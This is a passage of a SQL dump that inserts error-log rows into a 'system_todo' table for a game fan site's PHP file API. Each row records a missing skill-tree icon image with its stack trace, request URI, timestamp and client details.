SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.02, '2014-11-28 10:46:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warriordecesivestrike.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (320, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_decesivestrike.png\' found.', '212eabe0ad129010ce0037a6ef5e021889636cfa', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.016, '2014-12-13 23:14:09', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_decesivestrike.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (321, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_decisivestrike.png\' found.', '31d350acb87bef7a102a2fe07d87a976b604a2e5', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.008, '2014-12-13 21:49:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_decisivestrike.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 123, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (322, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_deathpact.png\' found.', '0287610409f5ab545dca86b8a5b87349e56c4288', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_de...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_de...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.004, '2014-12-13 21:49:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_deathpact.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 121, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (323, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_roue_sprint.png\' found.', 'b00d708d6d46996ae9f7ae1c9f4169dd84b845fc', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_roue_sp...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_roue_sp...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.032, '2014-11-28 10:49:04', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_roue_sprint.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (324, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_sprint.png\' found.', '24b5b2b12805a7804397cf0cb36de138ef805e5e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_s...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_s...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.024, '2014-12-13 21:42:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_rogue_sprint.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 112, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (325, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_ancestralguardian.png\' found.', 'f2b182df9de3090c371d19e8aa7c55212bc33498', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_an...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_an...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.028, '2014-12-13 21:42:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_ancestralguardian.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 110, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (326, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_bloodlust.png\' found.', 'ae6e41771a49b7187f5f27f01663fb2f390d074d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_bl...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_bl...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.008, '2014-12-13 21:42:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_bloodlust.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 106, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (327, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_shield_06.png\' found.', '8d822328a775b89ea51021a9374718c436c87e00', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_shield_06.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_shield_06.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.028, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_shield_06.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 118, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (328, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_mirrorimage.png\' found.', 'b6e62228cc7fcb692f98a66d0d5c75f60050ea89', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_mi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_mi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.02, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_mirrorimage.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 116, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (329, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_racial_bloodrage.png\' found.', '8ce2f7375d9060b9dfd96308c8a354f0e5fd6c67', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_racial_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_racial_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.028, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_racial_bloodrage.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 114, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (330, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_devotion.png\' found.', '7410050edd7ba4a331ca6648ca8fc924c27770cb', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_devo...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_devo...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.012, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_devotion.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 112, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (331, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_mage_magicarmor.png\' found.', '5a2c56928396e76efab7c7f2cca78531e0ddc7ab', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_mage_magi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_mage_magi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.012, '2014-11-28 10:54:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_mage_magicarmor.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (332, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_mage_magearmor.png\' found.', 'f094a3a3a02cd9159925561eb778a6d4cc399bcf', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_mage_mage...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_mage_mage...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.008, '2014-11-28 10:54:36', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_mage_magearmor.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (333, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_magic_magearmor.png\' found.', 'c9b9b3ee9930ba10613e37cb6b4a778499e58195', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_magic_mag...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_magic_mag...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.016, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_magic_magearmor.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 106, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (334, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'abiity_warrior_laststand.png\' found.', 'bfb6514515aed716bf3533463ce42bc7c9d007a1', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'abiity_warrior_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'abiity_warrior_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.036, '2014-11-28 10:55:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=abiity_warrior_laststand.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (335, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_ashestoashes.png\' found.', 'f2e00d9be7a99d7c0907a59326e1dfa41b20b1a9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_ashe...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_ashe...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.008, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_ashestoashes.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 102, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (336, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_defend.png\' found.', 'e71ce15b7d6a8b50d5878bbdc9243aed01b8d072', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_defend....\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_defend....\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.008, '2014-12-13 21:54:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_defend.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 102, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (337, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_revenge.png\' found.', 'be231137ff8cb9060ee14035d3cce4e50b1389df', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.012, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_revenge.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 99, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (338, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_innerrage.png\' found.', '65347cb1e8ab425146273e9901f64097e1673152', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.02, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_innerrage.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 96, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (339, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_sunder.png\' found.', '47d7d2088191c8213d92b63c4ddae4bf0a9862ba', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '130.83.216.8', 0.024, '2014-12-13 21:53:24', 'www.mojotrollz.eu', 80, 